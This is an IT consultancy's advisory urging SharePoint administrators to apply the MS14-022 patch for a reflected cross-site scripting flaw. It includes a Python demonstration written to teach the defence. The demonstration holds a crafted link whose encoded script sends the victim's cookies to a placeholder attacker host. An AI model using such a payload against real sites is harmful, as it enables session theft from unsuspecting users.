Hey folks
We’ve come across a SharePoint security concern that, if you are not already aware of it, requires your attention.
To be clear, we’re not fans of fear mongering. SharePoint patches pop up frequently, but we’ve identified this one as particularly critical.
We are currently applying this patch internally to protect ourselves and to develop a response to assist our clients with minimal disruption. We suggest you or your IT team treat this as a top priority and either address this yourself or schedule time with an itgroove consultant to get the patch deployed.
Here’s the background of the issue
- Microsoft rates it as a “Critical” security bulletin (MS14-022). It’s big enough that the US Department of Homeland Security’s US-CERT is addressing it on their site.
- It impacts SharePoint Server 2007, 2010 and 2013 (including SharePoint Foundation) and Office Web Apps (since renamed Office Online).
- This patch is particularly important for sites that are connected to the internet, because an attacker only needs to get one of your users to open a crafted link to your site.
Here are the technical details
- The fix addresses cross-site scripting (XSS): user-supplied input that SharePoint reflects into a page without sanitizing or encoding it. Because it is a straightforward input-handling correction rather than a change to core behaviour, it is very unlikely that Microsoft would pull or re-release this patch, so there is little reason to wait.
- It affects sites that are open to authenticated users as well as sites that allow anonymous access.
- It covers three CVEs (CVE-2014-1754 is the XSS one). At the time of release none of them was known to be under public attack, and they require social engineering aimed at your users to trigger: an attacker has to convince someone to open a specially crafted link or page.
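To make “un-sanitized user input” concrete, here is a small added example of the reflected-XSS mechanism the patch fixes. This is illustrative code written for this post; it is not SharePoint’s code and not the actual vulnerable page in the bulletin. The link, hostnames and the `search.aspx` page name are constructed placeholders. It shows the crafted link an attacker would send (the social-engineering step), what a page that reflects the input verbatim hands the victim’s browser, and what the same page produces once the input is HTML-encoded.

```python
"""
Reflected-XSS demonstration (added example, not SharePoint code).

A server takes a query-string value from the URL and writes it into the
HTML it returns. If the value is written verbatim, markup the attacker
placed in the link runs in the victim's browser; if it is HTML-encoded,
the browser shows it as harmless text.
"""
import html
from urllib.parse import urlparse, parse_qs

# Constructed sample: the kind of link an attacker would e-mail to a user.
# Hostnames and page name are placeholders, not real sites.
CRAFTED_LINK = (
    "https://intranet.example.test/search.aspx"
    "?q=%3Cscript%3Edocument.location%3D%22https%3A%2F%2Fattacker.example.test"
    "%2F%3Fc%3D%22%2Bdocument.cookie%3C%2Fscript%3E"
)


def query_param(url: str, name: str) -> str:
    """Return one query-string value, percent-decoded the way a web server would."""
    return parse_qs(urlparse(url).query).get(name, [""])[0]


def render_vulnerable(term: str) -> str:
    """Reflects the search term verbatim into the page (the unsanitized case)."""
    return f"<p>Results for: {term}</p>"


def render_hardened(term: str) -> str:
    """HTML-encodes the term before reflecting it.

    quote=True also encodes " and ', so the same call is safe when the value
    lands inside an attribute such as value="...".
    """
    return f"<p>Results for: {html.escape(term, quote=True)}</p>"


def contains_script_tag(page: str) -> bool:
    """Crude check used here to show whether a live <script> tag survived rendering."""
    return "<script" in page.lower()


if __name__ == "__main__":
    term = query_param(CRAFTED_LINK, "q")
    print("Decoded input:", term)
    print("Vulnerable page:", render_vulnerable(term))   # browser executes the script
    print("Hardened page:  ", render_hardened(term))     # browser shows it as text
```

The point for the bulletin: the attacker never needs an account on your server, only a user who clicks the link, and the script then runs with that user’s SharePoint session. Encoding output (the hardened function above) is the class of fix the patch applies; it is the reason the update is low-risk to deploy promptly.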
To learn more, here are some sources to review:
- https://isc.sans.edu/diary/Microsoft+May+2014+Patch+Tuesday/18113
- http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1754
- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1754
Please give us a call or send us an email to book time with one of our consultants for assistance.